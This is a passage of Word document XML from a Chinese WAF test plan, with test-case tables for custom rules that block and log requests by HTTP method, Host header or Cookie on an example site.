            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75E2F6EA">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F276FBD">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="741CA181">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="096CC914">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="_Toc21077819"/>
      <w:bookmarkStart w:id="137" w:name="_Toc81916123"/>
      <w:bookmarkStart w:id="138" w:name="_Toc608819754"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求方法匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
      <w:bookmarkEnd w:id="137"/>
      <w:bookmarkEnd w:id="138"/>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BEE6F7D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2D6AB771">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="720C4636">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义请求方法匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="35E8F62B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="65380193">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="30A14536">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配请求方法规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0F44B49E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4538A963">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="29C705AC">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53314EA1">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25A26AB4">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点时请求方式为GET时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62E44AAA">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>浏览器访问：</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK "http://www.site.com/shario/thinkPHPLogin" </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="36"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>h</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="36"/>
              </w:rPr>
              <w:t>ttp://www.site.com/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="36"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>sha</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="36"/>
              </w:rPr>
              <w:t>rio/thinkPHPLogin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="36"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B113C57">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221D56D2">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="59D1D129">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="615201D6">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="22E6950A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5A98753A">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25D62217">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6E52803">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="02F05B75">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59F13B2B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1677CC26">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CDF8B06">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="503CFC31">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA3BC71">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="139" w:name="_Toc21077820"/>
      <w:bookmarkStart w:id="140" w:name="_Toc81916124"/>
      <w:bookmarkStart w:id="141" w:name="_Toc1821511170"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Host匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139"/>
      <w:bookmarkEnd w:id="140"/>
      <w:bookmarkEnd w:id="14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4EF0CA3">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7A811051">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="445BE864">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义Host匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6C1A1AFE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="31C4878E">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="5B913138">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配Host规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="749ECCD5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="408A6075">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="17A34EC9">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F12262C">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="264F45D2">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点</w:t>
            </w:r>
            <w:r>
              <w:t>Host</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>字段中包含site</w:t>
            </w:r>
            <w:r>
              <w:t>.com</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A36490E">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>浏览器访问：h</w:t>
            </w:r>
            <w:r>
              <w:t>ttp://www.site.com/;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F9D67AB">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58ED031D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0B24ECAF">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="2298BF3B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="55139288">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="179D50B8">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="092E6CE0">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DC26EA4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6AE95E58">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15D5483D">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3240FFC9">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02A1A1A2">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="771B3230">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69615D83">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="142" w:name="_Toc21077821"/>
      <w:bookmarkStart w:id="143" w:name="_Toc81916125"/>
      <w:bookmarkStart w:id="144" w:name="_Toc1758846205"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142"/>
      <w:bookmarkEnd w:id="143"/>
      <w:bookmarkEnd w:id="14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F4BFADE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="574D5104">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="4C29EBE8">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义Cookie匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6204FF1F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="20E423D1">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="6B3EC47E">
            <w:pPr>
